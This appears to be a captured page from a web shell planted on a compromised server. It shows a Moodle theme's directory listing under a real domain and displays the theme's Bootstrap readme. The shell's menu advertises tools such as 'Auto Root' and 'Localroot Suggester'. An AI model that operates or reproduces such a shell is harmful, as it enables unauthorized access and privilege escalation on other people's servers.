Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
theme /
boost /
Delete
Unzip
Name
Size
Permission
Date
Action
amd
[ DIR ]
drwxr-sr-x
2017-06-22 14:56
classes
[ DIR ]
drwxr-sr-x
2017-06-22 14:58
cli
[ DIR ]
drwxr-sr-x
2017-06-22 14:58
lang
[ DIR ]
drwxr-sr-x
2017-06-22 14:56
layout
[ DIR ]
drwxr-sr-x
2017-06-22 14:59
pix
[ DIR ]
drwxr-sr-x
2017-06-22 14:59
scss
[ DIR ]
drwxr-sr-x
2017-06-22 15:00
templates
[ DIR ]
drwxr-sr-x
2017-06-22 15:00
tests
[ DIR ]
drwxr-sr-x
2017-06-22 14:57
config.php
5.22
KB
-rw-r--r--
2017-06-22 14:58
lib.php
3.17
KB
-rw-r--r--
2017-06-22 14:59
readme_moodle.txt
1.13
KB
-rw-r--r--
2017-06-22 14:59
settings.php
3.54
KB
-rw-r--r--
2017-06-22 15:00
thirdpartylibs.xml
2.86
KB
-rw-r--r--
2017-06-22 15:00
version.php
990
B
-rw-r--r--
2017-06-22 15:00
Save
Rename
Description of Twitter bootstrap import into Moodle Twitter bootstrap ----------------- Sass: This theme uses the original unmodified version 4.0.0-alpha-3 Twitter bootstrap sass files. The bootstrap repository is available on: https://github.com/twitter/bootstrap.git To update to the latest release of twitter bootstrap: * re-apply /* rtl:begin:ignore */ on the top of _popover.scss before .popover rule and /* rtl:end:ignore */ before .popover-arrow::after rule. See MDL-56763 commit (1a4faf9b). * remove all files from scss/bootstrap, * download the new scss files and store them in scss/bootstrap * update ./thirdpartylibs.xml Javascript: This theme uses the transpiled javascript from bootstrap4 as amd modules. To update the javascript files: Checkout the latest branch of bootstrap to a folder, in that folder run: > mkdir "out" > npm install babel-cli babel-preset-es2015 babel-plugin-transform-es2015-modules-amd > ./node_modules/babel-cli/bin/babel.js --presets es2015 --plugins transform-es2015-modules-amd -d out/ js/src/ Copy the transpiled files from out/ into the amd/src/ folder for the theme. Run grunt to re-compile the JS files.